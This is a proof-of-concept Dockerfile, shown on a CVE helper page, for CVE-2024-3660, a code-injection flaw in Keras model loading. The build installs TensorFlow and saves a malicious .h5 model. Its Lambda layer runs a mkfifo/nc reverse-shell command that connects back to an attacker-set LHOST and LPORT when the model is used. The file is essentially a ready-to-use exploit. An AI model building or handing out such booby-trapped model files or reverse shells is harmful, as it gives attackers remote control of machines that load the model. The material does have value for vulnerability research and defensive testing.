CVE-2024-3660 – CVE Helper

README.md
Rendering markdown...
POC / Dockerfile
⬇ Raw GitHub ✕ Close
# Force platform so wheel architecture matches TensorFlow wheel
FROM --platform=linux/amd64 python:3.8-slim

# Build arguments for payload parameters
ARG LHOST=127.0.0.1
ARG LPORT=4444

WORKDIR /CVE20243660

# Install curl, wget, and TensorFlow CPU wheel
RUN apt-get update && \
    apt-get install -y curl wget && \
    curl -k -LO https://files.pythonhosted.org/packages/65/ad/4e090ca3b4de53404df9d1247c8a371346737862cfe539e7516fd23149a4/tensorflow_cpu-2.13.1-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl && \
    pip install ./tensorflow_cpu-2.13.1-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl && \
    rm ./tensorflow_cpu-2.13.1-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl && \
    rm -rf /var/lib/apt/lists/*

# Create malicious model during build
RUN python3 - <<EOF
import tensorflow as tf


def arbexe(x):
    import os
    os.system(f"rm -f /tmp/f; mknod /tmp/f p; cat /tmp/f | /bin/sh -i 2>&1 | nc {os.environ['LHOST']} {os.environ['LPORT']} >/tmp/f")
    return x

model = tf.keras.Sequential()
model.add(tf.keras.layers.Input(shape=(64,)))
model.add(tf.keras.layers.Lambda(arbexe))
model.compile()
model.save("CVE20243660.h5")
EOF

ENTRYPOINT ["/bin/bash"]